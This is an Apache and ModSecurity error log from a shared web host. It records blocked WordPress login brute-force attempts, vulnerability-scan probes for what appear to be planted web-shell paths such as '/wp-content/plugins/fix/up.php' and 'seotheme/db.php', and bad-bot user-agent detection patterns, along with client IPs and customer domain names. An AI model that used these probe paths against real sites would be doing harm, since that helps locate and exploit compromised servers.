[Tue May 26 15:21:18.719929 2026] [security2:error] [pid 707292:tid 707517] [client 74.7.230.5:56142] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.digentasmartsn.com"] [uri "/robots.txt"] [unique_id "ahVtFtKAqlRPSIEFAutekgAA5BM"]
[Tue May 26 15:21:18.892491 2026] [security2:error] [pid 707292:tid 707490] [client 127.0.0.1:21456] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVtFtKAqlRPSIEFAutemgAAAMk"]
[Tue May 26 15:21:18.892569 2026] [security2:error] [pid 707292:tid 707512] [client 127.0.0.1:21442] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.digitalgerminate.com"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVtFtKAqlRPSIEFAutemQAAAN8"]
[Tue May 26 15:21:18.892714 2026] [security2:error] [pid 707292:tid 707453] [client 74.7.241.151:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.digitalgerminate.com"] [uri "/robots.txt"] [unique_id "ahVtFtKAqlRPSIEFAutemAAApH4"]
[Tue May 26 15:21:19.046120 2026] [security2:error] [pid 707292:tid 707514] [client 62.60.130.233:52066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVtF9KAqlRPSIEFAutepgAAAOE"], referer: https://www.google.fr/search?q=wordpress
[Tue May 26 15:21:19.435358 2026] [security2:error] [pid 707292:tid 707511] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtF9KAqlRPSIEFAutenwAAAN4"]
[Tue May 26 15:21:19.591433 2026] [core:error] [pid 707292:tid 707422] [client 62.60.130.233:58810] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.facebook.com/
[Tue May 26 15:21:19.591456 2026] [core:error] [pid 707292:tid 707422] [client 62.60.130.233:58810] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.facebook.com/
[Tue May 26 15:21:20.274405 2026] [security2:error] [pid 707292:tid 707322] [remote 57.141.2.25:23392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 25.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVtGNKAqlRPSIEFAute4AAA3B0"]
[Tue May 26 15:21:20.620900 2026] [security2:error] [pid 707292:tid 707455] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtGNKAqlRPSIEFAute4QAAAKY"]
[Tue May 26 15:21:22.457393 2026] [security2:error] [pid 707292:tid 707451] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtGtKAqlRPSIEFAutfHQAAAKI"]
[Tue May 26 15:21:24.164908 2026] [security2:error] [pid 707292:tid 707448] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtG9KAqlRPSIEFAutfYAAAAJ8"]
[Tue May 26 15:21:25.003073 2026] [security2:error] [pid 707292:tid 707539] [client 20.104.227.76:19517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpimentel.contabilidadecarioca.com.br"] [uri "/ioxi-o.php"] [unique_id "ahVtHdKAqlRPSIEFAutfhgAAAPo"]
[Tue May 26 15:21:25.049868 2026] [security2:error] [pid 707292:tid 707525] [client 196.189.152.144:7737] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVtHNKAqlRPSIEFAutfhQAAAOw"]
[Tue May 26 15:21:25.049914 2026] [security2:error] [pid 707292:tid 707525] [client 196.189.152.144:7737] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "www.ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVtHNKAqlRPSIEFAutfhQAAAOw"]
[Tue May 26 15:21:26.753265 2026] [security2:error] [pid 707292:tid 707496] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtHtKAqlRPSIEFAutftwAAAM8"]
[Tue May 26 15:21:29.014219 2026] [security2:error] [pid 707292:tid 707520] [client 182.8.225.106:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtINKAqlRPSIEFAutf8wAAAOc"]
[Tue May 26 15:21:29.033332 2026] [security2:error] [pid 707292:tid 707499] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtINKAqlRPSIEFAutf9gAAANI"]
[Tue May 26 15:21:29.369546 2026] [security2:error] [pid 707292:tid 707347] [remote 82.196.25.136:34532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVtIdKAqlRPSIEFAutgAwAAjDY"]
[Tue May 26 15:21:30.257668 2026] [security2:error] [pid 707292:tid 707448] [client 20.104.227.76:4446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpimentel.contabilidadecarioca.com.br"] [uri "/function/function.php"] [unique_id "ahVtItKAqlRPSIEFAutgJQAAAJ8"]
[Tue May 26 15:21:30.451844 2026] [security2:error] [pid 707292:tid 707450] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtItKAqlRPSIEFAutgHgAAAKE"]
[Tue May 26 15:21:31.060706 2026] [security2:error] [pid 707292:tid 707361] [remote 45.79.189.31:28124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVtItKAqlRPSIEFAutgNgAAzkQ"]
[Tue May 26 15:21:31.637882 2026] [security2:error] [pid 707292:tid 707494] [client 194.26.192.17:55792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-plain.php"] [unique_id "ahVtI9KAqlRPSIEFAutgRwAAAM0"], referer: www.google.com
[Tue May 26 15:21:31.643841 2026] [security2:error] [pid 707292:tid 707443] [client 194.26.192.17:55798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVtI9KAqlRPSIEFAutgSwAAAJo"]
[Tue May 26 15:21:31.662862 2026] [security2:error] [pid 707292:tid 707545] [client 194.26.192.17:55793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVtI9KAqlRPSIEFAutgTQAAAQA"], referer: www.google.com
[Tue May 26 15:21:31.708382 2026] [security2:error] [pid 707292:tid 707428] [client 194.26.192.17:55799] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVtI9KAqlRPSIEFAutgTAAAAIs"], referer: www.google.com
[Tue May 26 15:21:32.130415 2026] [security2:error] [pid 707292:tid 707536] [client 194.26.192.17:64546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVtJNKAqlRPSIEFAutgYwAAAPc"], referer: www.google.com
[Tue May 26 15:21:32.243131 2026] [security2:error] [pid 707292:tid 707529] [client 194.26.192.17:55799] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVtJNKAqlRPSIEFAutgZAAAAPA"], referer: www.google.com
[Tue May 26 15:21:32.464918 2026] [security2:error] [pid 707292:tid 707518] [client 194.26.192.17:54795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/pltsjpng.php"] [unique_id "ahVtJNKAqlRPSIEFAutgcQAAAOU"], referer: www.google.com
[Tue May 26 15:21:32.566419 2026] [security2:error] [pid 707292:tid 707475] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtJNKAqlRPSIEFAutgbQAAALo"]
[Tue May 26 15:21:33.067687 2026] [security2:error] [pid 707292:tid 707526] [client 194.26.192.17:64567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVtJdKAqlRPSIEFAutggwAAAO0"]
[Tue May 26 15:21:33.216060 2026] [security2:error] [pid 707292:tid 707368] [remote 148.251.232.195:10236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.232.251.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVtJdKAqlRPSIEFAutgggAAiks"]
[Tue May 26 15:21:33.342474 2026] [security2:error] [pid 707292:tid 707493] [client 194.26.192.17:64476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-plain.php"] [unique_id "ahVtJdKAqlRPSIEFAutgigAAAMw"], referer: www.google.com
[Tue May 26 15:21:33.742616 2026] [security2:error] [pid 707292:tid 707533] [client 194.26.192.17:62936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVtJdKAqlRPSIEFAutgnAAAAPQ"]
[Tue May 26 15:21:34.019704 2026] [security2:error] [pid 707292:tid 707522] [client 194.26.192.17:53002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/vkqmntob.php"] [unique_id "ahVtJtKAqlRPSIEFAutgogAAAOk"], referer: www.google.com
[Tue May 26 15:21:34.170110 2026] [security2:error] [pid 707292:tid 707371] [remote 172.104.164.56:58634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVtJdKAqlRPSIEFAutgnwAAwU4"]
[Tue May 26 15:21:34.950728 2026] [security2:error] [pid 707292:tid 707422] [client 20.104.227.76:15278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpimentel.contabilidadecarioca.com.br"] [uri "/rip.php"] [unique_id "ahVtJtKAqlRPSIEFAutgwgAAAIU"]
[Tue May 26 15:21:35.033670 2026] [security2:error] [pid 707292:tid 707437] [client 194.26.192.17:64728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVtJ9KAqlRPSIEFAutgxQAAAJQ"]
[Tue May 26 15:21:35.305255 2026] [security2:error] [pid 707292:tid 707471] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtJtKAqlRPSIEFAutgwQAAALY"]
[Tue May 26 15:21:35.736182 2026] [security2:error] [pid 707292:tid 707455] [client 194.26.192.17:55880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVtJ9KAqlRPSIEFAutg5QAAAKY"]
[Tue May 26 15:21:37.385205 2026] [security2:error] [pid 707292:tid 707458] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtKNKAqlRPSIEFAuthEQAAAKk"]
[Tue May 26 15:21:37.887705 2026] [security2:error] [pid 707292:tid 707472] [client 114.119.137.123:29175] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/wp-content/uploads/2017/04/house-demo2-42-143x83.jpg"] [unique_id "ahVtKdKAqlRPSIEFAuthJwAAALc"], referer: https://rainadelproperties.com/wp-content/uploads/2017/04/house-demo2-42-143x83.jpg
[Tue May 26 15:21:39.010910 2026] [security2:error] [pid 707292:tid 707526] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtKtKAqlRPSIEFAuthOgAAAO0"]
[Tue May 26 15:21:41.531908 2026] [security2:error] [pid 707292:tid 707538] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtLdKAqlRPSIEFAuthngAAAPk"]
[Tue May 26 15:21:41.647279 2026] [security2:error] [pid 707292:tid 707439] [client 8.215.24.140:58949] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/admin/index.php"] [unique_id "ahVtLdKAqlRPSIEFAuthpwAAAJY"]
[Tue May 26 15:21:43.099143 2026] [security2:error] [pid 707292:tid 707456] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtLtKAqlRPSIEFAuthyQAAAKc"]
[Tue May 26 15:21:43.133750 2026] [security2:error] [pid 707292:tid 707479] [client 85.208.96.206:43724] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVtL9KAqlRPSIEFAuth1gAAAL4"]
[Tue May 26 15:21:43.133878 2026] [security2:error] [pid 707292:tid 707479] [client 85.208.96.206:43724] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVtL9KAqlRPSIEFAuth1gAAAL4"]
[Tue May 26 15:21:43.623834 2026] [security2:error] [pid 707292:tid 707304] [remote 84.247.129.9:53558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVtL9KAqlRPSIEFAuth2gAA9ws"]
[Tue May 26 15:21:44.328807 2026] [security2:error] [pid 707292:tid 707301] [remote 51.79.229.9:33470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.229.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVtMNKAqlRPSIEFAuth8AAAsAg"]
[Tue May 26 15:21:45.366975 2026] [security2:error] [pid 707292:tid 707428] [client 20.104.227.76:39983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "alpimentel.contabilidadecarioca.com.br"] [uri "/admin.php"] [unique_id "ahVtMdKAqlRPSIEFAutiHwAAAIs"]
[Tue May 26 15:21:45.938722 2026] [security2:error] [pid 707292:tid 707519] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtMdKAqlRPSIEFAutiJgAAAOY"]
[Tue May 26 15:21:48.099028 2026] [security2:error] [pid 707292:tid 707434] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtM9KAqlRPSIEFAutieQAAAJE"]
[Tue May 26 15:21:49.966892 2026] [security2:error] [pid 707292:tid 707539] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtNdKAqlRPSIEFAutipgAAAPo"]
[Tue May 26 15:21:52.219767 2026] [security2:error] [pid 707292:tid 707500] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtN9KAqlRPSIEFAuti7wAAANM"]
[Tue May 26 15:21:54.279983 2026] [security2:error] [pid 707292:tid 707455] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtOdKAqlRPSIEFAutjLAAAAKY"]
[Tue May 26 15:21:56.407122 2026] [security2:error] [pid 707292:tid 707540] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtO9KAqlRPSIEFAutjaAAAAPs"]
[Tue May 26 15:21:58.612777 2026] [security2:error] [pid 707292:tid 707511] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtPtKAqlRPSIEFAutjnAAAAN4"]
[Tue May 26 15:21:58.835435 2026] [security2:error] [pid 707292:tid 707530] [client 92.246.140.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtPtKAqlRPSIEFAutjqAAAAPE"]
[Tue May 26 15:22:00.403317 2026] [security2:error] [pid 707292:tid 707482] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtQNKAqlRPSIEFAutj1wAAAME"]
[Tue May 26 15:22:02.241748 2026] [security2:error] [pid 707292:tid 707487] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtQdKAqlRPSIEFAutkCAAAAMY"]
[Tue May 26 15:22:04.202219 2026] [security2:error] [pid 707292:tid 707368] [remote 94.76.235.103:36906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVtRNKAqlRPSIEFAutkTQAAyks"]
[Tue May 26 15:22:04.766891 2026] [security2:error] [pid 707292:tid 707449] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtRNKAqlRPSIEFAutkWQAAAKA"]
[Tue May 26 15:22:06.912659 2026] [security2:error] [pid 707292:tid 707427] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtRtKAqlRPSIEFAutklgAAAIo"]
